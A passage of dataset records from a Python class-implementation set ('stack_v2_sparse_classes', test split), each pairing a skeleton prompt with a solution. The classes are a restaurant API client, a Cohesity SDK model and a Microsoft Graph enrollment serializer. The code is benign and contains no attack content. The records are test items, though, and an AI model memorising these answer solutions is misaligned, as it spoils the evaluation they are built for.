DatabaseOutputter:\n\n def get(self) -> RestaurantCatalog:\n \"\"\"Retrieve all current restaurants from the API\"\"\"\n <|body_0|>\n\n def insert(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_1|>\n\n def update(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_2|>\n\n def delete(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n catalog = RestaurantCatalog()\n try:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\n except ConnectionError:\n print('Failed to connect to API')\n return catalog\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return\n put_data = {'timestamp': token, 'data': data}\n res = requests.post(self.ENDPOINT, json=put_data)\n if res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)\n<|end_body_1|>\n\n<|body_start_2|>\n if len(data) == 0:\n return\n post_data = {'timestamp': token, 'data': data}\n res = requests.put(self.ENDPOINT, json=post_data)\n if res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)\n<|end_body_2|>\n\n<|body_start_3|>\n if len(data) == 0:\n return\n delete_data = {'timestamp': token, 'data': data}\n res = requests.delete(self.ENDPOINT, json=delete_data)\n if res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)\n<|end_body_3|>\n", "revision_id": "b9d4dd32b4d0dfaa287fd138887a616d962227b7", "skeleton": "<|skeleton|>\nclass DatabaseOutputter:\n\n def get(self) -> RestaurantCatalog:\n \"\"\"Retrieve all current restaurants from the API\"\"\"\n <|body_0|>\n\n def insert(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_1|>\n\n def update(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_2|>\n\n def delete(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DatabaseOutputter:\n def get(self) -> RestaurantCatalog:\n \"\"\"Retrieve all current restaurants from the API\"\"\"\n catalog = RestaurantCatalog()\n try:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\n except ConnectionError:\n print('Failed to connect to API')\n return catalog\n\n def insert(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as insert to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n if len(data) == 0:\n return\n put_data = {'timestamp': token, 'data': data}\n res = requests.post(self.ENDPOINT, json=put_data)\n if res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)\n\n def update(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as update to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n if len(data) == 0:\n return\n post_data = {'timestamp': token, 'data': data}\n res = requests.put(self.ENDPOINT, json=post_data)\n if res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)\n\n def delete(self, data: Union[dict, list], token: str) -> None:\n \"\"\"Send restaurants marked as delete to API :param data: a list of restaurants or a single restaurant :param token: an identifier for the current session, to ensure that separate POST / PUT / DELETE requests are recognized as a single version of data\"\"\"\n if len(data) == 0:\n return\n delete_data = {'timestamp': token, 'data': data}\n res = requests.delete(self.ENDPOINT, json=delete_data)\n if res.status_code != 200:\n print('Failed to send delete data to database, writing to file instead')\n FileOutputter().delete(data, token)\n", "source": "the_stack_v2_python_sparse", "source_path": "filter_xml/data_outputter.py", "source_repo": "sw814f21/filter_xml", "split": "test", "star_events_count": 0} {"blob_id": "ff24bbfbb7575d1124b87f8c015697f566bd3abd", "bodies": ["self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\nself.node_configs = node_configs\nself.vips = vips", "if dictionary is None:\n return None\nchassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\nnode_configs = None\nif dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\nvips = dictionary.get('vips')\nreturn cls(chassis_serial_to_rack_id_map, node_configs, vips)"], "bodies_text": "<|body_start_0|>\n self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\n self.node_configs = node_configs\n self.vips = vips\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n chassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\n node_configs = None\n if dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\n vips = dictionary.get('vips')\n return cls(chassis_serial_to_rack_id_map, node_configs, vips)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.", "class_name": "ExpandPhysicalClusterParameters", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExpandPhysicalClusterParameters:\n \"\"\"Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\"\"\"\n\n def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None):\n \"\"\"Constructor for the ExpandPhysicalClusterParameters class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\n self.node_configs = node_configs\n self.vips = vips\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n chassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\n node_configs = None\n if dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\n vips = dictionary.get('vips')\n return cls(chassis_serial_to_rack_id_map, node_configs, vips)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000356", "length_bytes": 2462, "license_type": "permissive", "methods": [{"docstring": "Constructor for the ExpandPhysicalClusterParameters class", "name": "__init__", "signature": "def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `ExpandPhysicalClusterParameters` described below.\n\nClass description:\nImplementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\n\nMethod signatures and docstrings:\n- def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None): Constructor for the ExpandPhysicalClusterParameters class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `ExpandPhysicalClusterParameters` described below.\n\nClass description:\nImplementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\n\nMethod signatures and docstrings:\n- def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None): Constructor for the ExpandPhysicalClusterParameters class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass ExpandPhysicalClusterParameters:\n \"\"\"Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\"\"\"\n\n def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None):\n \"\"\"Constructor for the ExpandPhysicalClusterParameters class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\n self.node_configs = node_configs\n self.vips = vips\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n chassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\n node_configs = None\n if dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\n vips = dictionary.get('vips')\n return cls(chassis_serial_to_rack_id_map, node_configs, vips)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass ExpandPhysicalClusterParameters:\n \"\"\"Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\"\"\"\n\n def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None):\n \"\"\"Constructor for the ExpandPhysicalClusterParameters class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExpandPhysicalClusterParameters:\n \"\"\"Implementation of the 'ExpandPhysicalClusterParameters' model. Specifies the parameters needed to expand a Cohesity Physical Edition Cluster. Attributes: chassis_serial_to_rack_id_map (object): ChassisSerialToRackId map. node_configs (list of PhysicalNodeConfiguration, required): Specifies the configuration details of the Nodes in the Cluster. vips (list of string): Specifies the virtual IPs to add to the Cluster.\"\"\"\n\n def __init__(self, chassis_serial_to_rack_id_map=None, node_configs=None, vips=None):\n \"\"\"Constructor for the ExpandPhysicalClusterParameters class\"\"\"\n self.chassis_serial_to_rack_id_map = chassis_serial_to_rack_id_map\n self.node_configs = node_configs\n self.vips = vips\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n chassis_serial_to_rack_id_map = dictionary.get('chassisSerialToRackIdMap')\n node_configs = None\n if dictionary.get('nodeConfigs') != None:\n node_configs = list()\n for structure in dictionary.get('nodeConfigs'):\n node_configs.append(cohesity_management_sdk.models.physical_node_configuration.PhysicalNodeConfiguration.from_dictionary(structure))\n vips = dictionary.get('vips')\n return cls(chassis_serial_to_rack_id_map, node_configs, vips)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/expand_physical_cluster_parameters.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "327c271a1e6e32587d0e66bc1c8ab8ebfa9a49a3", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\ntry:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\nexcept AttributeError:\n mapping_value = None\nif mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\nif mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\nif mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\nreturn DeviceEnrollmentConfiguration()", "from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\nfrom .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\nfrom .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\nfrom .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\nfrom .entity import Entity\nfrom .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\nfrom .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\nfrom .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\nfrom .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\nfrom .entity import Entity\nfields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_collection_of_object_values('assignments', self.assignments)\nwriter.write_datetime_value('createdDateTime', self.created_date_time)\nwriter.write_str_value('description', self.description)\nwriter.write_str_value('displayName', self.display_name)\nwriter.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\nwriter.write_int_value('priority', self.priority)\nwriter.write_int_value('version', self.version)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n try:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\n except AttributeError:\n mapping_value = None\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\n return DeviceEnrollmentConfiguration()\n<|end_body_0|>\n\n<|body_start_1|>\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_collection_of_object_values('assignments', self.assignments)\n writer.write_datetime_value('createdDateTime', self.created_date_time)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_int_value('priority', self.priority)\n writer.write_int_value('version', self.version)\n<|end_body_2|>\n", "class_docstring": "The Base Class of Device Enrollment Configuration", "class_name": "DeviceEnrollmentConfiguration", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DeviceEnrollmentConfiguration:\n \"\"\"The Base Class of Device Enrollment Configuration\"\"\"\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n try:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\n except AttributeError:\n mapping_value = None\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\n return DeviceEnrollmentConfiguration()\n<|end_body_0|>\n\n<|body_start_1|>\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_collection_of_object_values('assignments', self.assignments)\n writer.write_datetime_value('createdDateTime', self.created_date_time)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_int_value('priority', self.priority)\n writer.write_int_value('version', self.version)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000357", "length_bytes": 6436, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `DeviceEnrollmentConfiguration` described below.\n\nClass description:\nThe Base Class of Device Enrollment Configuration\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `DeviceEnrollmentConfiguration` described below.\n\nClass description:\nThe Base Class of Device Enrollment Configuration\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass DeviceEnrollmentConfiguration:\n \"\"\"The Base Class of Device Enrollment Configuration\"\"\"\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> DeviceEnrollmentConfiguration:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: DeviceEnrollmentConfiguration\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n try:\n mapping_value = parse_node.get_child_node('@odata.type').get_str_value()\n except AttributeError:\n mapping_value = None\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentLimitConfiguration'.casefold():\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n return DeviceEnrollmentLimitConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentPlatformRestrictionsConfiguration'.casefold():\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n return DeviceEnrollmentPlatformRestrictionsConfiguration()\n if mapping_value and mapping_value.casefold() == '#microsoft.graph.deviceEnrollmentWindowsHelloForBusinessConfiguration'.casefold():\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n return DeviceEnrollmentWindowsHelloForBusinessConfiguration()\n return DeviceEnrollmentConfiguration()\n<|end_body_0|>\n\n<|body_start_1|>\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n from .device_enrollment_limit_configuration import DeviceEnrollmentLimitConfiguration\n from .device_enrollment_platform_restrictions_configuration import DeviceEnrollmentPlatformRestrictionsConfiguration\n from .device_enrollment_windows_hello_for_business_configuration import DeviceEnrollmentWindowsHelloForBusinessConfiguration\n from .enrollment_configuration_assignment import EnrollmentConfigurationAssignment\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'assignments': lambda n: setattr(self, 'assignments', n.get_collection_of_object_values(EnrollmentConfigurationAssignment)), 'createdDateTime': lambda n: setattr(self, 'created_date_time', n.get_datetime_value()), 'description': lambda n: setattr(self, 'description', n.get_str_value()), 'displayName': lambda n: setattr(self, 'display_name', n.get_str_value()), 'lastModifiedDateTime': lambda n: setattr(self, 'last_modified_date_time', n.get_datetime_value()), 'priority': lambda n: setattr(self, 'priority', n.get_int_value()), 'version': lambda n: setattr(self, 'version', n.get_int_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_collection_of_object_values('assignments', self.assignments)\n writer.write_datetime_value('createdDateTime', self.created_date_time)\n writer.write_str_value('description', self.description)\n writer.write_str_value('displayName', self.display_name)\n writer.write_datetime_value('lastModifiedDateTime', self.last_modified_date_time)\n writer.write_int_value('priority', self.priority)\n writer.write_int_value('version', self.version)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass DeviceEnrollmentConfiguration:\n \"\"\"The Base Class of Device Enrollment Configuration\"\"\"\n\n def 